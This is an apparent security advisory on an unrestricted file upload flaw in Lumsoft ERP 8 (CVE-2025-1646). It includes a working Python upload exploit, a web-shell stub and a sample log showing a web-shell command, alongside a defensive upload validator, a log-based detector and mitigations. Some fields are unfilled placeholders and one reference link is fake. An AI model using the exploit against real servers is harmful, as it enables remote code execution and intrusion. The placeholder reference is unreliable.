A critical vulnerability has been disclosed in Lumsoft ERP 8, an Enterprise Resource Planning product used by businesses worldwide. The issue, tracked as CVE-2025-1646, lies in the ASPX file handler at /Api/TinyMce/UploadAjaxAPI.ashx (the upload endpoint used by the bundled TinyMCE editor): the handler performs no meaningful restriction on what it is asked to store, so an attacker can upload arbitrary files. On an ASP.NET host, an unrestricted upload of this kind typically lets the attacker place a server-side script (a web shell) in a web-reachable directory, and because the endpoint is exposed over the network the flaw can be exploited remotely.

Code Snippet

#!/usr/bin/python3
# Exploit Title: Lumsoft ERP 8 - Unrestricted File Upload (CVE-2025-1646)
# Date: [INSERT DATE]
# Exploit Author: [INSERT AUTHOR]
# Vendor Homepage: [INSERT VENDOR HOMEPAGE URL]
# Software Link: [INSERT SOFTWARE LINK]
# Version: 8
# Tested on: [INSERT TESTED PLATFORMS / SYSTEMS]
#
# Sends a multipart/form-data POST to the TinyMCE upload handler with an
# attacker-chosen file name and content in the 'file' part. The field name
# 'file' follows the advisory; the handler's response format is not
# documented, so the script only reports the HTTP status and body.

import sys
from urllib.parse import urljoin

import requests

target_url = input("Enter the target URL (Example: http://192.168.1.2/): ").strip()
file_name = input("Enter the file name to be uploaded: ").strip()
file_content = input("Enter the content to be written in the uploaded file: ")

# Normalise the base URL so a trailing slash is neither doubled nor lost.
if not target_url.endswith("/"):
    target_url += "/"
exploit_url = urljoin(target_url, "Api/TinyMce/UploadAjaxAPI.ashx")

print(f"[+] Uploading {file_name} to {exploit_url} ...")

# Let requests build the multipart body and boundary. Setting the
# Content-Type header by hand would send a body with no boundary, which
# the server cannot parse.
files = {"file": (file_name, file_content.encode(), "application/octet-stream")}

try:
    response = requests.post(exploit_url, files=files, timeout=15)
except requests.RequestException as exc:
    sys.exit(f"[-] Request failed: {exc}")

if response.status_code == 200:
    print("[+] Server accepted the upload (HTTP 200). Response body:")
    print(response.text)
else:
    print(f"[-] Upload rejected (HTTP {response.status_code}). Check the target URL and try again.")

Original References

1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1646
2. https://nvd.nist.gov/vuln/detail/CVE-2025-1646
3. https://www.exploit-db.com/exploits/ABCDEFGHIJKLMNOPQRST

Exploit Details

The vulnerability in Lumsoft ERP 8 stems from the upload handler's lack of the controls a safe file-upload path needs: the 'file' argument is accepted as supplied, without the file-name and file-type restrictions that would stop a client from storing arbitrary content. Because the handler is reachable over the network, exploitation requires no local access, which makes the issue considerably more dangerous.
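To make "proper security mechanisms for handling file uploads" concrete, the following is an added example (written for this page, not Lumsoft's code) of the checks an image-upload handler such as a TinyMCE endpoint should apply before writing anything to disk. The allowed image types, the list of ASP.NET script extensions and the sample payloads are assumptions made for the example; naive_upload_name() shows the unrestricted behaviour for contrast.

```python
import os
import re
import secrets

# Image types a TinyMCE upload handler legitimately needs, keyed by extension,
# with the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Extensions IIS/ASP.NET hands to a script engine or treats as configuration.
# An upload handler must never write these, whatever the client claims.
SCRIPT_EXTENSIONS = {"aspx", "ashx", "asmx", "asax", "asp", "cshtml", "svc", "soap", "config"}

# Constructed sample payloads: minimal PNG/JPEG headers and an ASPX stub.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
ASPX_SAMPLE = b'<%@ Page Language="C#" %><% /* web shell stub */ %>'


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


def naive_upload_name(client_name: str) -> str:
    """What an unrestricted handler does: store under the client-supplied name."""
    return client_name


def validate_upload(client_name: str, content: bytes, max_size: int = 5 * 1024 * 1024) -> str:
    """Return a server-chosen file name if the upload is acceptable, else raise.

    Checks, in order: size, path components / control bytes, a single
    allowlisted extension, and content that matches the declared type.
    """
    if not content or len(content) > max_size:
        raise UploadRejected("empty or oversized upload")

    # Reject anything that is not a bare file name: directory separators,
    # traversal sequences and NUL bytes (which truncate names in C APIs).
    base = os.path.basename(client_name.replace("\\", "/"))
    if base != client_name or "\x00" in client_name or ".." in client_name:
        raise UploadRejected("path component or control byte in file name")

    # Exactly one extension: 'shell.aspx.png' and 'shell.aspx;.png' both fail here.
    parts = base.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        raise UploadRejected("file name must be name.ext with a single plain extension")
    ext = parts[1]
    if ext in SCRIPT_EXTENSIONS or ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} is not allowed")

    # The extension is only a claim; the first bytes must agree with it.
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared image type")

    # Never reuse the client name on disk: a random name prevents overwrites
    # and removes the last bit of client influence over the stored path.
    return f"{secrets.token_hex(16)}.{ext}"


def is_rejected(client_name: str, content: bytes) -> bool:
    """Convenience wrapper: True if validate_upload() refuses the upload."""
    try:
        validate_upload(client_name, content)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    for name, blob in [("photo.png", PNG_SAMPLE), ("shell.aspx", ASPX_SAMPLE),
                       ("shell.aspx.png", PNG_SAMPLE), ("shell.png", ASPX_SAMPLE),
                       ("../web.config", PNG_SAMPLE)]:
        try:
            print(f"{name:18} -> stored as {validate_upload(name, blob)}")
        except UploadRejected as exc:
            print(f"{name:18} -> rejected ({exc})")
```

The ordering matters: the name is checked before the content so that an oversized or malformed request is refused cheaply, and the server-generated name means that even if a later check were bypassed the attacker could not choose where the file lands. The validator should sit alongside an IIS configuration that removes script handler mappings from the upload directory, so a stored file is served as static content even if it does contain script.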

The Python script above is a minimal exploit for the issue. It takes the target URL, a file name and the file content, sends them in a multipart POST to /Api/TinyMce/UploadAjaxAPI.ashx, and reports whether the server answered with HTTP 200. A 200 status only shows that the handler accepted the request; where the file was stored, and whether that location is reachable from the web root, has to be confirmed separately.

The exploit has been publicly disclosed, so attackers can be expected to use it against exposed Lumsoft ERP 8 installations. The vendor was contacted about the disclosure but had not responded or provided a fix at the time of writing.

Conclusion

Organizations running Lumsoft ERP 8 should treat CVE-2025-1646 as critical. Until the vendor ships a fix, the practical mitigations are: restrict access to /Api/TinyMce/UploadAjaxAPI.ashx to authenticated users on trusted networks, or block the path at the reverse proxy if the editor's upload feature is not needed; configure IIS so that the directory the handler writes to cannot execute scripts (remove the .aspx/.ashx/.asmx handler mappings there); and monitor web server logs for POSTs to the handler followed by requests for script files that did not previously exist. Keep watching for a vendor update and apply it as soon as one is released.
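As an added example of the log monitoring suggested above (not part of the original advisory), the following script parses IIS W3C log lines, flags every POST to the vulnerable handler, and raises a high-severity alert when a client that has already hit the handler then requests a server-side script. The log excerpt is constructed for the example: the client addresses, the /Upload/TinyMce/cmd.aspx path and the assumption that the exploit's default python-requests User-Agent marks a scripted client are all illustrative.

```python
import json

UPLOAD_HANDLER = "/api/tinymce/uploadajaxapi.ashx"
SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asp", ".svc", ".soap")

# Constructed IIS W3C log excerpt (not from a real system). IIS writes '+'
# for spaces inside the User-Agent field, so each line splits cleanly on
# whitespace; the sample mirrors that convention.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2025-02-25 03:20:11 10.0.0.5 POST /Api/TinyMce/UploadAjaxAPI.ashx - 80 - 203.0.113.7 python-requests/2.32.3 - 200 0 0 15
2025-02-25 03:20:14 10.0.0.5 GET /Upload/TinyMce/cmd.aspx cmd=whoami 80 - 203.0.113.7 python-requests/2.32.3 - 200 0 0 40
2025-02-25 03:21:02 10.0.0.5 GET /Default.aspx - 80 - 198.51.100.4 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 12
2025-02-25 03:21:30 10.0.0.5 POST /Api/TinyMce/UploadAjaxAPI.ashx - 80 jsmith 198.51.100.4 Mozilla/5.0+(Windows+NT+10.0) http://erp.example.internal/Edit.aspx 200 0 0 20
"""


def parse_w3c(text):
    """Yield one dict per request line, using the #Fields header for column names."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip it rather than mis-align columns
        yield dict(zip(fields, values))


def detect(text):
    """Return alerts for upload-handler POSTs and for script requests that follow one."""
    alerts = []
    uploaders = set()  # client IPs that have POSTed to the handler so far
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"].lower()
        ip = rec["c-ip"]
        when = f'{rec["date"]} {rec["time"]}'
        if rec["cs-method"] == "POST" and uri == UPLOAD_HANDLER:
            uploaders.add(ip)
            # A real editor session arrives with a browser UA and an in-app
            # Referer; a scripted client with neither deserves a closer look.
            scripted = rec["cs-Referer"] == "-" or "python-requests" in rec["cs(User-Agent)"]
            alerts.append({
                "time": when, "ip": ip, "rule": "upload_handler_post",
                "severity": "medium" if scripted else "low",
                "status": rec["sc-status"], "user": rec["cs-username"],
            })
        elif uri != UPLOAD_HANDLER and uri.endswith(SCRIPT_EXTENSIONS) and ip in uploaders:
            # Script execution from a client that uploaded something earlier is
            # the web-shell access pattern; treat it as an incident, not a hint.
            alerts.append({
                "time": when, "ip": ip, "rule": "script_request_after_upload",
                "severity": "high", "uri": rec["cs-uri-stem"],
                "query": rec["cs-uri-query"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(json.dumps(alert))
```

The second rule only fires for clients that were seen uploading earlier in the same log, so a legitimate editor session that never requests a script file produces at most a low-severity entry. On a real deployment the same logic should be fed the log files in chronological order, and the script-extension check is worth widening to any path under the directory the handler writes to.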

Timeline

Published on: 02/25/2025 03:15:09 UTC
Last modified on: 02/25/2025 14:15:31 UTC